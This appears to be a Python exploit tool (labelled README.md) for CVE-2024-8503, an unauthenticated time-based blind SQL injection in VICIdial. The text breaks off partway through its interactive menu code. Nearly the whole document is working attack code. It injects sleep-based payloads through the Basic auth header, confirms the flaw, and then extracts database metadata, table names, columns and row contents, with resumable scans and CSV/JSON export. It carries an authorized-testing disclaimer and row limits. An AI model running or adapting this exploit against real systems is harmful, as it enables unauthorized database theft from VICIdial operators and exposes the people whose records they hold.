README.md
Rendering markdown...
#!/usr/bin/env python3
"""
VICIdial CVE-2024-8503 Proof of Concept Tool
=============================================
Unauthenticated SQL Injection in VERM_AJAX_functions.php
LEGAL DISCLAIMER:
This tool is provided for authorized security testing and educational purposes only.
Unauthorized access to computer systems is illegal. Users must obtain explicit written
permission before testing any systems they do not own. The authors assume no liability
for misuse or damage caused by this tool.
Author: Machine-Farmer
CVE: CVE-2024-8503
Date: November 2024
"""
import argparse
import requests
import time
import base64
import statistics
import sys
import json
import csv
import os
import pickle
from datetime import datetime
from typing import Optional, Dict, List, Tuple
# Suppress urllib3 warnings; every request in this file is sent with verify=False.
requests.packages.urllib3.disable_warnings()
# ============================================================================
# CONFIGURATION - STRICT LIMITS FOR SECURITY
# ============================================================================
VERSION = "1.0.1"
# Inclusive ordinal bounds of the characters the per-character binary search
# considers (used as the initial low/high in extract_character).
CHAR_MIN = 32
CHAR_MAX = 126
# Default maximum number of characters extract_string reads for one value.
MAX_LENGTH = 250
# Per-cell character cap passed by extract_table_data.
MAX_CELL_LENGTH = 100
# Default number of baseline requests made by calibrate_timing.
BASELINE_ITERS = 4
# calibrate_timing sets sleep_duration = max(2, round(baseline_avg * SLEEP_MULTIPLIER)).
SLEEP_MULTIPLIER = 30
# Stricter limits for PoC security
DEFAULT_ROW_LIMIT = 10
MAX_ROW_LIMIT = 10
DEFAULT_COLUMN_LIMIT = 10
MAX_COLUMN_LIMIT = 10
# Also used by list_tables as the upper clamp for its limit argument.
DEFAULT_TABLE_LIMIT = 10
# Auto-extraction limits (passed by auto_extract_table)
AUTO_COLUMN_LIMIT = 10
AUTO_ROW_LIMIT = 10
# Metadata name -> SQL expression. extract_metadata prefixes "SELECT " to any
# entry that does not already start with "SELECT".
METADATA_QUERIES = {
    'db_version': '@@version',
    'database': 'DATABASE()',
    'db_user': 'CURRENT_USER()',
    'hostname': '@@hostname',
    'db_privileges': 'SELECT GROUP_CONCAT(privilege_type) FROM information_schema.user_privileges WHERE grantee LIKE CONCAT("%",SUBSTRING_INDEX(CURRENT_USER(),"@",1),"%") LIMIT 1',
    'table_count': 'SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=DATABASE()',
}
# ============================================================================
# STATE MANAGEMENT FOR RESUMABLE SCANS
# ============================================================================
class ScanState:
    """Persist scan progress to a JSON file so an interrupted scan can resume.

    The in-memory ``state`` dict always contains every key returned by
    ``_default_state``; ``load_state`` merges whatever is on disk into those
    defaults, so the accessors below can index the dict directly.
    """

    def __init__(self, state_file: str = ".vicidial_scan_state.json"):
        """Create the state holder and load ``state_file`` if it exists."""
        self.state_file = state_file
        self.state = self._default_state()
        self.load_state()

    @staticmethod
    def _default_state() -> dict:
        """Return a fresh, empty state dict (new containers on every call)."""
        return {
            'target': None,
            'completed_steps': [],
            'metadata_results': {},
            'tables_list': [],
            'table_columns': {},  # table -> [columns]
            'table_data': {},  # table -> {column -> [rows]}
            'current_step': None,
            'last_updated': None,
        }

    def load_state(self):
        """Load previous scan state if it exists.

        A file that cannot be read or parsed, or whose top level is not a JSON
        object, is reported and ignored. Keys missing from the file, or holding
        a value of the wrong container type, keep their default so later
        lookups cannot raise ``KeyError``/``AttributeError``.
        """
        if os.path.exists(self.state_file):
            try:
                with open(self.state_file, 'r', encoding='utf-8') as f:
                    loaded = json.load(f)
            except (OSError, ValueError) as e:
                # ValueError covers json.JSONDecodeError and UnicodeDecodeError.
                print(f"[!] Could not load state file: {e}")
                return
            if not isinstance(loaded, dict):
                print("[!] Could not load state file: top-level JSON value is not an object")
                return
            merged = self._default_state()
            for key, value in loaded.items():
                default = merged.get(key)
                # List/dict slots must keep their container type; slots whose
                # default is None (and unknown keys) accept any value.
                if default is not None and not isinstance(value, type(default)):
                    continue
                merged[key] = value
            self.state = merged
            print(f"[+] Loaded previous scan state from {self.state_file}")
        elif os.path.exists(".vicidial_scan_state.pkl"):
            print("[!] Legacy pickle state file found; ignoring for safety. Remove it if not needed.")

    def save_state(self):
        """Save current scan state.

        The JSON is written to a sibling temporary file and then moved over
        the real file, so an interrupted write cannot leave a truncated state
        file behind. Failures are reported, not raised.
        """
        self.state['last_updated'] = datetime.now().isoformat()
        tmp_path = f"{self.state_file}.tmp"
        try:
            with open(tmp_path, 'w', encoding='utf-8') as f:
                json.dump(self.state, f, indent=2)
            os.replace(tmp_path, self.state_file)
        except (OSError, TypeError, ValueError) as e:
            print(f"[!] Could not save state: {e}")

    def clear_state(self):
        """Delete the state file (if present) and reset the in-memory state."""
        if os.path.exists(self.state_file):
            os.remove(self.state_file)
        self.state = self._default_state()

    def is_step_completed(self, step: str) -> bool:
        """Check if a step was already completed"""
        return step in self.state['completed_steps']

    def mark_step_completed(self, step: str):
        """Mark a step as completed (idempotent) and persist."""
        if step not in self.state['completed_steps']:
            self.state['completed_steps'].append(step)
        self.save_state()

    def update_metadata(self, key: str, value: str):
        """Store one metadata result and persist."""
        self.state['metadata_results'][key] = value
        self.save_state()

    def get_metadata(self, key: str) -> Optional[str]:
        """Return the saved metadata value for ``key``, or None."""
        return self.state['metadata_results'].get(key)

    def update_tables(self, tables: List[str]):
        """Replace the saved table list and persist."""
        self.state['tables_list'] = tables
        self.save_state()

    def get_tables(self) -> List[str]:
        """Return the saved table list (empty if none)."""
        return self.state.get('tables_list', [])

    def update_table_columns(self, table: str, columns: List[str]):
        """Store the column list for ``table`` and persist."""
        self.state.setdefault('table_columns', {})[table] = columns
        self.save_state()

    def get_table_columns(self, table: str) -> List[str]:
        """Return the saved columns for ``table`` (empty if none)."""
        return self.state.get('table_columns', {}).get(table, [])

    def update_table_data(self, table: str, column: str, rows: List[str]):
        """Store row data for ``table``/``column`` and persist."""
        per_table = self.state.setdefault('table_data', {})
        per_table.setdefault(table, {})[column] = rows
        self.save_state()

    def get_table_data(self, table: str, column: str) -> List[str]:
        """Return saved row data for ``table``/``column`` (empty if none)."""
        return self.state.get('table_data', {}).get(table, {}).get(column, [])

    def set_target(self, target: str):
        """Record the target URL and persist."""
        self.state['target'] = target
        self.save_state()

    def get_target(self) -> Optional[str]:
        """Return the saved target URL, or None."""
        return self.state.get('target')

    def show_resume_prompt(self) -> bool:
        """Summarise the saved scan and ask whether to resume it.

        Returns False when there is no saved target, when the user answers
        anything other than ``y``, or when the user answers ``clear`` (which
        also wipes the saved state). Returns True only for ``y``.
        """
        if not self.state.get('target'):
            return False
        completed = self.state['completed_steps']
        print("\n" + "="*70)
        print("PREVIOUS SCAN DETECTED")
        print("="*70)
        print(f"Target: {self.state['target']}")
        print(f"Last Updated: {self.state.get('last_updated', 'Unknown')}")
        print(f"Completed Steps: {len(completed)}")
        for step in completed:
            print(f" ✓ {step}")
        print(f"Tables Found: {len(self.state.get('tables_list', []))}")
        print(f"Tables with Columns: {len(self.state.get('table_columns', {}))}")
        print("="*70)
        choice = input("\nResume from previous scan? (y/n/clear): ").strip().lower()
        if choice == 'clear':
            self.clear_state()
            print("[+] Scan state cleared. Starting fresh.")
            return False
        return choice == 'y'
# ============================================================================
# NOTIFICATION SYSTEM
# ============================================================================
def send_notification(title: str, message: str):
    """Send a best-effort desktop notification.

    ``title`` and ``message`` are passed to the platform notifier as argument
    values and never through a shell, so shell metacharacters in them are not
    interpreted. If the notifier is missing, fails, or the platform is not
    recognised, the terminal bell is printed instead. Never raises.
    """
    # Local import: subprocess is only needed here.
    import subprocess

    def _applescript_literal(text: str) -> str:
        """Quote ``text`` as an AppleScript string literal."""
        return '"' + text.replace('\\', '\\\\').replace('"', '\\"') + '"'

    try:
        if sys.platform == 'darwin':
            script = (
                f"display notification {_applescript_literal(message)} "
                f"with title {_applescript_literal(title)}"
            )
            subprocess.run(['osascript', '-e', script], check=False, timeout=10)
        elif sys.platform == 'linux':
            # "--" stops option parsing so a leading "-" in the text is not
            # mistaken for a notify-send flag.
            subprocess.run(['notify-send', '--', title, message], check=False, timeout=10)
        elif sys.platform == 'win32':
            try:
                from win10toast import ToastNotifier
                toaster = ToastNotifier()
                toaster.show_toast(title, message, duration=10)
            except ImportError:
                print('\a')
        else:
            print('\a')
    except Exception:
        # Deliberate best-effort: a notification failure must not abort a scan.
        print('\a')
def play_completion_sound():
    """Ring the terminal bell to signal that a scan has finished.

    Any error raised while printing is ignored.
    """
    bell = '\a'
    try:
        print(bell)
    except Exception:
        return
# ============================================================================
# CORE EXPLOITATION ENGINE
# ============================================================================
class SQLInjectionEngine:
    """Core engine for time-based blind SQL injection.

    Holds the target URL, the fixed query parameters and the sleep duration,
    and derives the elapsed-time threshold used to classify a response as
    "delayed".
    """

    def __init__(self, target: str, params: dict, sleep_duration: int):
        """Store the request settings.

        Args:
            target: Full URL requests are sent to.
            params: Query-string parameters sent with every request.
            sleep_duration: Seconds used in the injected sleep() call.
        """
        self.target = target
        self.params = params
        self.sleep_duration = sleep_duration
        # A response counts as delayed at 80% of the requested sleep.
        self.timing_threshold = sleep_duration * 0.8

    @staticmethod
    def make_auth_header(user: str, pwd: str = 'x') -> dict:
        """Return an Authorization header dict with "user:pwd" base64-encoded as Basic auth."""
        cred = f"{user}:{pwd}"
        return {'Authorization': 'Basic ' + base64.b64encode(cred.encode()).decode()}

    def probe(self, headers: dict, timeout: int = 30) -> Tuple[Optional[float], Optional[int]]:
        """Send one GET request and time it.

        Returns:
            (elapsed_seconds, status_code), or (None, None) if the request
            raised any exception.
        """
        try:
            start = time.perf_counter()
            r = requests.get(self.target, params=self.params, headers=headers,
                             verify=False, timeout=timeout)
            elapsed = time.perf_counter() - start
            return elapsed, r.status_code
        except Exception:
            return None, None

    def test_condition(self, query: str, position: int, threshold: int) -> Optional[bool]:
        """Test whether the ASCII value at ``position`` of the query result is <= ``threshold``.

        Returns:
            True if the response took at least ``timing_threshold`` seconds,
            False if it was faster, None if the probe failed.
        """
        condition = f"ASCII(SUBSTRING(({query}),{position},1))<={threshold}"
        inner_query = f"SELECT IF({condition},sleep({self.sleep_duration}),NULL)"
        payload = f"goolicker', '', ({inner_query}));#:"
        headers = {'User-Agent': 'KoreLogic-Test', **self.make_auth_header(payload)}
        elapsed, _ = self.probe(headers)
        if elapsed is None:
            return None
        return elapsed >= self.timing_threshold

    def extract_character(self, query: str, position: int, max_retries: int = 3) -> Optional[str]:
        """Extract the single character at ``position`` using binary search with retries.

        Returns:
            The character, or None when the position holds no character in
            the CHAR_MIN..CHAR_MAX range or no value could be confirmed.

        Raises:
            RuntimeError: A probe still failed on the final attempt.
        """
        for attempt in range(max_retries):
            try:
                # A "true" answer for <= CHAR_MIN - 1 is treated as "nothing to
                # read at this position" and ends extraction for the caller.
                exists = self.test_condition(query, position, CHAR_MIN - 1)
                if exists is None:
                    if attempt < max_retries - 1:
                        print(f"\n[!] Network error at position {position}, retry {attempt + 1}/{max_retries}...")
                        time.sleep(2)
                        continue
                    raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
                if exists:
                    return None
                # Binary search for the smallest threshold that answers "true".
                low, high = CHAR_MIN, CHAR_MAX
                char_ord = None
                while low <= high:
                    mid = (low + high) // 2
                    is_lte = self.test_condition(query, position, mid)
                    if is_lte is None:
                        if attempt < max_retries - 1:
                            print(f"\n[!] Network error during binary search, retry {attempt + 1}/{max_retries}...")
                            time.sleep(2)
                            break
                        raise RuntimeError(f"Network error at position {position} after {max_retries} retries")
                    if is_lte:
                        char_ord = mid
                        high = mid - 1
                    else:
                        low = mid + 1
                if char_ord is None:
                    if attempt < max_retries - 1:
                        continue
                    return None
                # Confirm the candidate: true at char_ord and not true just below it.
                current = self.test_condition(query, position, char_ord)
                previous = self.test_condition(query, position, char_ord - 1)
                if current and not previous:
                    return chr(char_ord)
                # Confirmation failed; re-check the neighbouring ordinals (+/- 2).
                for ordinal in range(max(CHAR_MIN, char_ord - 2), min(CHAR_MAX, char_ord + 2) + 1):
                    curr = self.test_condition(query, position, ordinal)
                    prev = self.test_condition(query, position, ordinal - 1)
                    if curr and not prev:
                        return chr(ordinal)
                return None
            except RuntimeError as e:
                if attempt < max_retries - 1:
                    print(f"\n[!] Error: {e}, retry {attempt + 1}/{max_retries}...")
                    time.sleep(2)
                    continue
                raise
        return None

    def extract_string(self, query: str, maxlen: int = MAX_LENGTH,
                       show_progress: bool = True) -> str:
        """Extract the query result one character at a time.

        Stops at the first position for which extract_character returns None,
        or after ``maxlen`` characters. When ``show_progress`` is true each
        character is written to stdout as soon as it is known.
        """
        result = []
        for pos in range(1, maxlen + 1):
            char = self.extract_character(query, pos)
            if char is None:
                break
            result.append(char)
            if show_progress:
                sys.stdout.write(char)
                sys.stdout.flush()
        return ''.join(result)
# ============================================================================
# VULNERABILITY SCANNER
# ============================================================================
class VulnerabilityScanner:
    """Main scanner for CVE-2024-8503.

    Calibrates response timing, optionally verifies the target, and then
    delegates all value extraction to an SQLInjectionEngine created by
    ``initialize``.
    """

    def __init__(self, url: str, path: str):
        """Build the target URL from ``url`` (trailing "/" removed) plus ``path``."""
        self.target = url.rstrip('/') + path
        self.params = {'function': 'log_custom_report'}
        # Set by initialize(); the extraction methods need it to be non-None.
        self.engine = None
        self.baseline_avg = 0.0
        self.sleep_duration = 0

    def calibrate_timing(self, iterations: int = BASELINE_ITERS) -> bool:
        """Measure baseline response time and derive the sleep duration.

        Sets ``baseline_avg`` to the mean of the successful timings and
        ``sleep_duration`` to max(2, round(baseline_avg * SLEEP_MULTIPLIER)).

        Returns:
            True on success; False if the final attempt times out or cannot
            connect, on any other exception, or if no timing was collected.
        """
        print("[*] Calibrating timing baseline...")
        baseline_times = []
        for i in range(iterations):
            try:
                start = time.perf_counter()
                response = requests.get(self.target, params=self.params,
                                        headers={'User-Agent': 'KoreLogic-Test'},
                                        verify=False, timeout=30)
                elapsed = time.perf_counter() - start
                baseline_times.append(elapsed)
                print(f" Attempt {i+1}/{iterations}: {elapsed:.3f}s (Status: {response.status_code})")
                time.sleep(0.25)
            except requests.exceptions.Timeout:
                print(f"[-] Timeout on attempt {i+1}/{iterations}")
                if i < iterations - 1:
                    print(" Retrying...")
                    continue
                else:
                    print("[-] Too many timeouts during calibration")
                    return False
            except requests.exceptions.ConnectionError as e:
                print(f"[-] Connection error on attempt {i+1}/{iterations}: {e}")
                if i < iterations - 1:
                    print(" Retrying...")
                    time.sleep(1)
                    continue
                else:
                    print("[-] Could not connect to target")
                    return False
            except Exception as e:
                print(f"[-] Unexpected error during calibration: {e}")
                return False
        if not baseline_times:
            print("[-] No successful calibration attempts")
            return False
        self.baseline_avg = statistics.mean(baseline_times)
        self.sleep_duration = max(2, round(self.baseline_avg * SLEEP_MULTIPLIER))
        print(f"[+] Baseline: {self.baseline_avg:.3f}s | Sleep: {self.sleep_duration}s")
        return True

    def verify_vulnerability(self) -> bool:
        """Send one sleep() probe and report whether the response was delayed.

        Returns:
            True if the request took at least 80% of ``sleep_duration``;
            False otherwise or if the request raised.
        """
        print("[*] Testing vulnerability...")
        inj_user = f"', '', sleep({self.sleep_duration}));#:"
        headers = {
            'User-Agent': 'KoreLogic-Test',
            **SQLInjectionEngine.make_auth_header(inj_user)
        }
        try:
            start = time.perf_counter()
            requests.get(self.target, params=self.params, headers=headers,
                         verify=False, timeout=self.sleep_duration + 10)
            elapsed = time.perf_counter() - start
            if elapsed >= (self.sleep_duration * 0.8):
                print(f"[+] Vulnerability CONFIRMED (delay: {elapsed:.3f}s)")
                return True
            else:
                print(f"[-] Vulnerability NOT detected (delay: {elapsed:.3f}s)")
                return False
        except Exception as e:
            print(f"[-] Error during verification: {e}")
            return False

    def initialize(self, skip_vuln_check: bool = False) -> bool:
        """Calibrate, optionally verify, then create the engine.

        Returns:
            False if calibration fails or (unless ``skip_vuln_check``) the
            verification probe is negative; True once ``engine`` is set.
        """
        if not self.calibrate_timing():
            return False
        if not skip_vuln_check:
            if not self.verify_vulnerability():
                return False
        self.engine = SQLInjectionEngine(self.target, self.params, self.sleep_duration)
        return True

    def extract_metadata(self, query_name: str, query: str) -> Optional[str]:
        """Extract one metadata value.

        ``query`` is prefixed with "SELECT " unless it already starts with
        "SELECT". Returns the extracted string, or None if the engine is not
        initialised or extraction raised RuntimeError.
        """
        if not self.engine:
            return None
        full_query = query if query.startswith('SELECT') else f"SELECT {query}"
        try:
            print(f"\n[+] Extracting: {query_name}")
            print(f" Query: {query}")
            sys.stdout.write(f" Value: ")
            sys.stdout.flush()
            result = self.engine.extract_string(full_query)
            print(f"\n Result: {repr(result)}")
            return result
        except RuntimeError as e:
            print(f"\n ERROR: {e}")
            return None

    def list_tables(self, limit: int = DEFAULT_TABLE_LIMIT) -> List[str]:
        """List table names of the current database.

        ``limit`` is clamped to the range 1..DEFAULT_TABLE_LIMIT. Returns the
        comma-split names, or an empty list if nothing was extracted or
        extraction raised RuntimeError.
        """
        limit = min(max(limit, 1), DEFAULT_TABLE_LIMIT)
        query = (
            "SELECT GROUP_CONCAT(table_name SEPARATOR ',') "
            "FROM (SELECT table_name FROM information_schema.tables "
            "WHERE table_schema=DATABASE() ORDER BY table_name LIMIT {limit}) AS tbls"
        ).format(limit=limit)
        print(f"\n[+] Listing tables (limit: {limit})...")
        sys.stdout.write(" Tables: ")
        sys.stdout.flush()
        try:
            tables_str = self.engine.extract_string(query)
            print("\n")
            if not tables_str:
                return []
            return tables_str.split(',')
        except RuntimeError as e:
            print(f"\n ERROR: {e}")
            return []

    def get_table_columns(self, table: str, limit: int = DEFAULT_COLUMN_LIMIT) -> List[str]:
        """Get column names for ``table``.

        ``limit`` is capped at MAX_COLUMN_LIMIT (no lower bound is applied).
        Returns the comma-split names, or an empty list if nothing was
        extracted or extraction raised RuntimeError.
        """
        if limit > MAX_COLUMN_LIMIT:
            print(f" [!] Limit capped at {MAX_COLUMN_LIMIT} columns for PoC")
            limit = MAX_COLUMN_LIMIT
        query = f"SELECT GROUP_CONCAT(column_name SEPARATOR ',') FROM (SELECT column_name FROM information_schema.columns WHERE table_schema=DATABASE() AND table_name='{table}' LIMIT {limit}) AS cols"
        print(f"\n[+] Getting columns for table: {table} (limit: {limit})")
        sys.stdout.write(" Columns: ")
        sys.stdout.flush()
        try:
            cols_str = self.engine.extract_string(query)
            print("\n")
            if not cols_str:
                return []
            return cols_str.split(',')
        except RuntimeError as e:
            print(f"\n ERROR: {e}")
            return []

    def extract_table_data(self, table: str, columns: List[str],
                           limit: int = DEFAULT_ROW_LIMIT, start_position: int = 0) -> List[Dict[str, str]]:
        """Extract up to ``limit`` rows of ``columns`` from ``table``, cell by cell.

        ``limit`` is capped at MAX_ROW_LIMIT. Empty cells are stored as "NULL"
        and failed cells as "ERROR". A row is kept only if at least one cell
        produced a value. Extraction stops early, returning the rows collected
        so far, after three consecutive cell errors or on KeyboardInterrupt.

        Args:
            table: Table to read from.
            columns: Column names, read one cell at a time.
            limit: Number of rows to attempt.
            start_position: Zero-based offset of the first row.
        """
        if limit > MAX_ROW_LIMIT:
            print(f" [!] Row limit capped at {MAX_ROW_LIMIT} for PoC")
            limit = MAX_ROW_LIMIT
        print(f"\n[+] Extracting data from: {table}")
        print(f" Columns: {', '.join(columns)}")
        print(f" Starting from row: {start_position + 1}")
        print(f" Rows to extract: {limit}\n")
        results = []
        consecutive_errors = 0
        max_consecutive_errors = 3
        for offset in range(limit):
            row_num = start_position + offset
            print(f"[Row {row_num + 1} (offset {offset + 1}/{limit})]")
            row_data = {}
            row_has_data = False
            for col in columns:
                query = f"SELECT {col} FROM {table} LIMIT {row_num},1"
                sys.stdout.write(f" {col:.<25} ")
                sys.stdout.flush()
                try:
                    value = self.engine.extract_string(query, maxlen=MAX_CELL_LENGTH, show_progress=False)
                    row_data[col] = value if value else "NULL"
                    if value:
                        row_has_data = True
                    print(value if value else "NULL")
                    consecutive_errors = 0  # Reset error counter on success
                except RuntimeError as e:
                    print(f"ERROR: {str(e)[:50]}")
                    row_data[col] = "ERROR"
                    consecutive_errors += 1
                    if consecutive_errors >= max_consecutive_errors:
                        print(f"\n[!] Too many consecutive errors ({consecutive_errors}), stopping extraction")
                        print(f"[!] Successfully extracted {len(results)} rows before errors")
                        return results
                except KeyboardInterrupt:
                    print("\n[!] Extraction interrupted by user")
                    print(f"[!] Partial results: {len(results)} rows extracted")
                    return results
                except Exception as e:
                    print(f"UNEXPECTED ERROR: {str(e)[:50]}")
                    row_data[col] = "ERROR"
                    consecutive_errors += 1
                    if consecutive_errors >= max_consecutive_errors:
                        print(f"\n[!] Too many consecutive errors, stopping extraction")
                        return results
            # Only add row if it has some actual data
            if row_has_data or any(v not in ["NULL", "ERROR"] for v in row_data.values()):
                results.append(row_data)
            else:
                print(f" [!] Row {row_num + 1} appears empty, may have reached end of table")
                # If we get an empty row, we might be past the end of the table
                # if row_num > start_position: # Don't stop if it's the first row at new position
                # break
            print()
        return results

    def auto_extract_table(self, table: str) -> Tuple[List[str], List[Dict[str, str]]]:
        """Discover the columns of ``table`` and then extract its rows.

        Uses AUTO_COLUMN_LIMIT and AUTO_ROW_LIMIT.

        Returns:
            (columns, rows); both are empty lists when no columns were found.
        """
        print(f"\n[+] Auto-extracting from table: {table}")
        print(f" Step 1: Discovering columns (limit: {AUTO_COLUMN_LIMIT})...")
        columns = self.get_table_columns(table, AUTO_COLUMN_LIMIT)
        if not columns:
            print("[-] No columns found")
            return [], []
        print(f" Found {len(columns)} columns: {', '.join(columns)}")
        print(f" Step 2: Extracting data (limit: {AUTO_ROW_LIMIT} rows)...\n")
        data = self.extract_table_data(table, columns, AUTO_ROW_LIMIT)
        return columns, data
# ============================================================================
# OUTPUT FORMATTERS
# ============================================================================
class OutputFormatter:
    """Format, display and export extraction results.

    All methods are static; the class is only a namespace.
    """

    @staticmethod
    def print_banner():
        """Print tool banner"""
        banner = """
╔═══════════════════════════════════════════════════════════════════════╗
║ ║
║ VICIdial CVE-2024-8503 Proof of Concept Tool ║
║ Unauthenticated SQL Injection Exploit ║
║ ║
║ Version: 1.0.1 (Secure Edition) ║
║ Author: Machine-Farmer ║
║ For Authorized Security Testing Only ║
║ ║
╚═══════════════════════════════════════════════════════════════════════╝
"""
        print(banner)

    @staticmethod
    def print_metadata_summary(results: Dict[str, str]):
        """Print metadata extraction summary.

        Values are converted with ``str()`` before measuring or slicing, so a
        non-string value (for example a number restored from a state file)
        is displayed instead of raising ``TypeError``. Values longer than 60
        characters are truncated with "...". A ``table_names`` entry is shown
        as a numbered list of at most 15 names.
        """
        print("\n" + "="*70)
        print("METADATA EXTRACTION SUMMARY")
        print("="*70)
        for key, value in results.items():
            label = key.replace('_', ' ').title()
            text = value if isinstance(value, str) else str(value)
            if key == 'table_names' and value and text != 'ERROR':
                print(f"{label}:")
                for idx, tbl in enumerate(text.split(',')[:15], 1):
                    print(f" {idx:2d}. {tbl}")
            else:
                display_val = text[:60] + "..." if len(text) > 60 else text
                print(f" {label:.<25} {display_val}")
        print("="*70)

    @staticmethod
    def print_table_list(tables: List[str]):
        """Print a numbered list of tables."""
        print("\n" + "="*70)
        print(f"TABLES FOUND: {len(tables)}")
        print("="*70)
        for idx, table in enumerate(tables, 1):
            print(f" {idx:2d}. {table}")
        print("="*70)

    @staticmethod
    def print_columns_list(table: str, columns: List[str]):
        """Print a numbered list of the columns of ``table``."""
        print("\n" + "="*70)
        print(f"COLUMNS IN TABLE: {table}")
        print("="*70)
        for idx, col in enumerate(columns, 1):
            print(f" {idx:2d}. {col}")
        print("="*70)

    @staticmethod
    def print_table_data(table: str, columns: List[str], data: List[Dict[str, str]]):
        """Print extracted rows as a fixed-width text table.

        Each column is at least as wide as its name (minimum 10) and grows to
        fit its values up to 50 characters; longer values are truncated with
        "...". Prints a notice and returns if ``data`` is empty.
        """
        if not data:
            print("[-] No data extracted")
            return
        widths = {col: max(len(col), 10) for col in columns}
        for row in data:
            for col in columns:
                value = str(row.get(col, ''))
                widths[col] = max(widths[col], min(len(value), 50))
        # "| " + cells joined by " | " + " |" adds 3 characters per column plus 1.
        total_width = sum(widths.values()) + len(columns) * 3 + 1
        rule = "="*total_width
        print("\n" + rule)
        print(f"DATA FROM TABLE: {table}".center(total_width))
        print(rule)
        header = " | ".join(col.ljust(widths[col]) for col in columns)
        print(f"| {header} |")
        print(rule)
        for row in data:
            row_values = []
            for col in columns:
                value = str(row.get(col, 'N/A'))
                if len(value) > widths[col]:
                    value = value[:widths[col]-3] + "..."
                row_values.append(value.ljust(widths[col]))
            row_str = " | ".join(row_values)
            print(f"| {row_str} |")
        print(rule)
        print(f"\nTotal rows: {len(data)}\n")

    @staticmethod
    def export_json(data: dict, filename: str):
        """Write ``data`` to ``filename`` as indented JSON (UTF-8).

        Raises:
            OSError: The file could not be written.
        """
        with open(filename, 'w', encoding='utf-8') as f:
            json.dump(data, f, indent=2)
        print(f"[+] Results exported to: {filename}")

    @staticmethod
    def export_csv(columns: List[str], data: List[Dict[str, str]], filename: str):
        """Write ``data`` to ``filename`` as CSV (UTF-8) with ``columns`` as the header.

        Raises:
            OSError: The file could not be written.
            ValueError: A row contains a key that is not in ``columns``.
        """
        # newline='' lets the csv module control line endings itself.
        with open(filename, 'w', newline='', encoding='utf-8') as f:
            writer = csv.DictWriter(f, fieldnames=columns)
            writer.writeheader()
            writer.writerows(data)
        print(f"[+] Data exported to: {filename}")
# ============================================================================
# INTERACTIVE MODE
# ============================================================================
class InteractiveMode:
    """Interactive menu-driven interface.

    Wraps a VulnerabilityScanner and a ScanState: every menu action calls the
    scanner, stores what it got in the scan state, and prints the result via
    OutputFormatter.
    """

    # Metadata menu choice -> (label shown while extracting, METADATA_QUERIES key).
    _METADATA_CHOICES = {
        '1': ('Database Version', 'db_version'),
        '2': ('Database Name', 'database'),
        '3': ('Database User', 'db_user'),
        '4': ('Hostname', 'hostname'),
        '5': ('User Privileges', 'db_privileges'),
        '6': ('Table Count', 'table_count'),
    }

    def __init__(self, scanner: VulnerabilityScanner, scan_state: Optional[ScanState] = None):
        """Store the scanner and scan state (a new ScanState is created if none is given)."""
        self.scanner = scanner
        self.scan_state = scan_state if scan_state else ScanState()
        self.metadata_queries = METADATA_QUERIES

    @staticmethod
    def _prompt_limit(prompt: str, default: int) -> int:
        """Ask for a positive integer; fall back to ``default`` on empty or invalid input.

        A non-numeric or non-positive answer would otherwise raise ValueError
        (ending the session) or be passed on as a zero/negative limit.
        """
        raw = input(prompt).strip()
        if not raw:
            return default
        try:
            value = int(raw)
        except ValueError:
            print(f"[-] Invalid number {raw!r}; using default ({default})")
            return default
        if value < 1:
            print(f"[-] Limit must be at least 1; using default ({default})")
            return default
        return value

    @staticmethod
    def _offer_csv_export(table: str, columns: List[str], data: List[Dict[str, str]]):
        """Ask whether to export ``data`` to a timestamped CSV file and do so on 'y'."""
        export = input("\nExport to CSV? (y/n): ").strip().lower()
        if export != 'y':
            return
        filename = f"{table}_{datetime.now().strftime('%Y%m%d_%H%M%S')}.csv"
        try:
            OutputFormatter.export_csv(columns, data, filename)
        except OSError as e:
            # e.g. a table name that is not a valid file name; keep the session alive.
            print(f"[-] Could not write {filename}: {e}")

    def show_main_menu(self):
        """Display main menu"""
        print("\n" + "="*70)
        print("MAIN MENU")
        print("="*70)
        print(" 1. Extract Metadata")
        print(" 2. List Tables")
        print(" 3. Get Table Columns")
        print(" 4. Extract Table Data (Manual)")
        print(" 5. Auto-Extract Table Data (Discover + Extract)")
        print(" 6. Custom Query")
        print(" 7. Extract All (Full Scan - Resumable)")
        print(" 8. View Scan State")
        print(" 9. Clear Scan State")
        print(" 0. Exit")
        print("="*70)

    def show_metadata_menu(self):
        """Display metadata extraction menu"""
        print("\n" + "="*70)
        print("METADATA EXTRACTION")
        print("="*70)
        print(" 1. Database Version")
        print(" 2. Database Name")
        print(" 3. Database User")
        print(" 4. Hostname")
        print(" 5. User Privileges")
        print(" 6. Table Count")
        print(" 7. Extract All Metadata")
        print(" 0. Back to Main Menu")
        print("="*70)

    def extract_metadata_interactive(self):
        """Run the metadata sub-menu until the user chooses 0.

        Choices 1-6 extract one item; 7 extracts every entry of
        ``metadata_queries`` and prints a summary. Non-empty results are
        saved to the scan state.
        """
        while True:
            self.show_metadata_menu()
            choice = input("\nSelect option: ").strip()
            if choice == '0':
                break
            if choice in self._METADATA_CHOICES:
                label, key = self._METADATA_CHOICES[choice]
                result = self.scanner.extract_metadata(label, self.metadata_queries[key])
                if result:
                    self.scan_state.update_metadata(key, result)
            elif choice == '7':
                results = {}
                for name, query in self.metadata_queries.items():
                    result = self.scanner.extract_metadata(name, query)
                    if result:
                        results[name] = result
                        self.scan_state.update_metadata(name, result)
                OutputFormatter.print_metadata_summary(results)
            else:
                print("[-] Invalid option")

    def list_tables_interactive(self):
        """List tables, save them to the scan state and print them."""
        print(f"\n[+] Listing tables (limit: {DEFAULT_TABLE_LIMIT})...")
        tables = self.scanner.list_tables()
        if tables:
            self.scan_state.update_tables(tables)
        OutputFormatter.print_table_list(tables)

    def get_columns_interactive(self):
        """Prompt for a table and a column limit, then list its columns."""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        limit = self._prompt_limit(
            f"Number of columns to retrieve (max {MAX_COLUMN_LIMIT}) [{DEFAULT_COLUMN_LIMIT}]: ",
            DEFAULT_COLUMN_LIMIT,
        )
        columns = self.scanner.get_table_columns(table, limit)
        if columns:
            self.scan_state.update_table_columns(table, columns)
        OutputFormatter.print_columns_list(table, columns)

    def extract_data_interactive(self):
        """Prompt for table, columns and row limit, then extract and print rows."""
        table = input("\nEnter table name: ").strip()
        if not table:
            print("[-] Table name required")
            return
        columns_str = input("Enter column names (comma-separated): ").strip()
        # Drop empty entries produced by stray or trailing commas.
        columns = [c.strip() for c in columns_str.split(',') if c.strip()]
        if not columns:
            print("[-] Column names required")
            return
        limit = self._prompt_limit(
